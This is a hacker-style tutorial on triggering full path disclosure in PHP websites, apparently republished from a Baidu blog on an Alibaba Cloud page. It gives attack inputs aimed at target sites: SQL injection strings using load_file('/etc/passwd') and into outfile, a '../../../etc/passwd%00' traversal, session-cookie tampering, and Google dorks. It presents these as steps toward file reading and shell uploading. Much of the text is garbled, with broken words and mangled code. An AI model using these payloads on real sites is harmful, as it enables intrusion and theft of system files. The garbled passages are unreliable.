Full Path Disclosure Tutorial

Source: Internet
Author: User
Tags php error reporting

Greetings from, well, me? : P

In this little write up today, I am going to try and explain ain you what 'fpd' is, how to detect it, analyze it, and some pretty good methods of finding it in the wild.

/* Note that my write up was intended to PHP-based websites, but some of the methods works for ASP/ASPX too .*/
/* I never imply myself to be an expert. If you see any mistakes-You know what to do! */

But first... The hell is FPD?

'Fpd' (Stands for Full Path Disclosure) is one of the most common methods of attacks (While I doubt this kind of action categorized as a form of an attack, it is still a highly-related method of website security testing ), that Pen-testers/Hackers/whatever use in order to gain an error which will expose the full installation path of the targeted site.

Why is this happening?

By default (Don't quote me here. Some web-services and packages disable this function, but partly in most cases), the PHP error reporting function-

Code: error_reporting (0 );

'1' = On. => 0 = Off.
Any kind of PHP error that happens when you load up a page will display itself on the page. That error is meant to modify y the programmer about a coding glitch on his page.

The common error wowould basically look something similar to this-
Code: Warning: function (function. name) [Function_name]: Some brief summery in/home/user-name/public_html/website. pony/rawr. php on line 126The regular programmer wocould take in account everything, please CT the full path, which does not interest him that much (Aside from the file name itself )... unlike the intruder.

Now the question is: Why is the path needed?

Because, it is a must-have detail at some cases of those three attacks:

SQL Injection using load_file () & outfile

Those two SQL Queries (Also the 'dumpfile' query, so make it three) require the full path of the targeted directory in order to execute themselves.
Example:
Code:/**/load_file ('/home/pony/www/httpdocs/public_html/index. php ')--
/**/Into outfile '/home/pony/www/httpdocs/public_html/rawr.txt '--
Local File transfer Sion (LFI)

Some variants of LFI attacks won't allow you to poison logs/use filters, so you can try loading your own way through the site.

Symbolic linking (Symlinking)

At some cases, when uploading a shell is not an option, you 'd rather know the path in order to work a symbolic link-A sort cut.

And more methods which I can't come up with as for this moment.

So, How to cause it?

Oh, there's quite a few methods:

[#] Transforming X type of variables to type Y
Code: http://site.com/index.php? Err = 4 ==> http://site.com/index.php? Err = lolLet's say 'err' is a number-y variable. It means, it cocould only $ _ GET numbers to it's related code.
Sooo... Try to insert a string instead. Might work.

[#] Using false file namesCode: http://site.com/index.php? Page = index. php ==> http://site.com/index.php? Err = ThisDoesNotExist. phpPossible Output:
Code: Warning: require (ThisDoesNotExist. php) [function. require]: failed to open stream: No such file or directory in/home/content/g/a/r/gardenlover/html/admin/index. php on line 25

Fatal error: require () [function. require]: Failed opening required'thisdoesnotexist. php '(include_path = '. :/usr/local/php5/lib/php') in/home/content/g/a/r/gardenlover/html/admin/index. php on line 25The script is including every kind name that goes through the $ _ GET, and prints the file under the requested name. now, what will happen if we include a non-existing file? ~

[#] Basically messing around with the value of the parameter
Code: http://site.com/index.php? Err = 4 ==> http://site.com/index.php? Err= 4.1
Http://site.com/index.php? Err = 4 ==> http://site.com/index.php? Err =-4
Http://site.com/index.php? Err = 4 ==> http://site.com/index.php? Err = 4! Sometimes, the value will be limited to only one style of inputs, and any kind of tweak wocould result a "Divided By Zero" PHP error.

[#] Braces.
Code: http://site.com/index.php? Err = 4 ==> http://site.com/index.php? Err [] = 4 Well, it is messing up the parameter in a different way, so it's a different method xD
I believe this has something to do with the whole array usage at PHP (Uses braces ?), Not sure though.
Possible output:
Code: Warning: opendir (Array): failed to open dir: No such file or directory in/home/omg/htdocs/index. php on line 84
Warning: pg_num_rows (): supplied argument... in/usr/home/example/html/pie/index. php on line 131
[#] Messing around with the COOKIEZ
Code: javascript: void (document. cookie = "PHPSESSID ="); <= Into your browser
(Does also possible from a cookie editor browser addon) So, what did we just done?
Simple-We changed the value of the 'phpsessid' cookie (A default cookie name, found in probably-every-site-that-uses-cookies)... nothing. it becomes null.
Which, as you already guessed, fucks up something at the session:
Code: Warning: session_start () [function. session-start]: The session id contains illegal characters,
Valid characters are a-z, A-Z, 0-9 and '-,' in/home/example/public_html/functions des/functions. php on line 2You can try and edit other cookies of the site as well. in addition, you can also junk the cookie with illegal characters, and stuff like that.

[#] SQLi fuckery
Code: http://site.com/index.php? Http://site.com/index.php? Id = '4
Http://site.com/index.php? Http://site.com/index.php? Id = 4 ';
Http://site.com/index.php? Http://site.com/index.php? Id = 4 + and + 1 = 2 -- +
Http://site.com/index.php? Http://site.com/index.php? Id = 0
Http://site.com/index.php? Http://site.com/index.php? Id = 4 + div + 0 -- + Possible Output:
Code: Warning: mysql_num_rows (): supplied argument is not a valid MySQL result resource in/home/user14/domains/login on line 666 Creating an SQL data synthesizing error, which in result, will reveal us the asked FPD.
[#] Inner-library-files-thingie
Code: http://site.com/wordpress/ => http://site.com/wordpress/inner-file-example.phpTraveling into inner files that has an undefined/defined twice functions will might result an output of the full FPD.

Other ways to get FPD, without coding errors.

[#] PHPINFO ();
Code: http://site.com/phpinfo.php
Http://sie.com/phpinfo/
Http://www.bkjia.com/phpdetails. phpFor some reason or another (Probably to often check the defined setting etc), some sites open a page with the php details. Well, we can use that ~
Pic:
Spoiler (Click to Hide) Look at the document root. ^_^

[#] '/Etc/passwd' <-Default linux & FreeBSD categories-alike file. (Echos all the users of the box, their group number, and their installed path)
Code: http://www.bkjia.com/index. php? Lol =-1 + union + select + 1, 2, 3, load_file ('/etc/passwd') -- +
Http://site.com/index.php? Lol = .. /.. /.. /etc/passwd % 00 Spoiler (Click to Hide) Because of the fact that a dedicated linux user was created for the web-service, obviously, his path will be visible on the site. not always though, try to play smart here-Most of webservice users will be named after the domain/the domain itself.

[#] Google dorking
Code: site: site.com & intext: "include ()"
Site: site.com & intext: "mysql" "error" Pretty straight and simple. Insert your site, and look for any possible errors. You know what I like about Google? (Fuck, I like everything about it, but here's another reason), it also stores cache-pages, or, results-that-are-not-updated. you might find an error which was last week, but does not exist today at the same page

From http://hi.baidu.com/evilrapper/blog/item/6924db27c6430023918f9d89.html

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.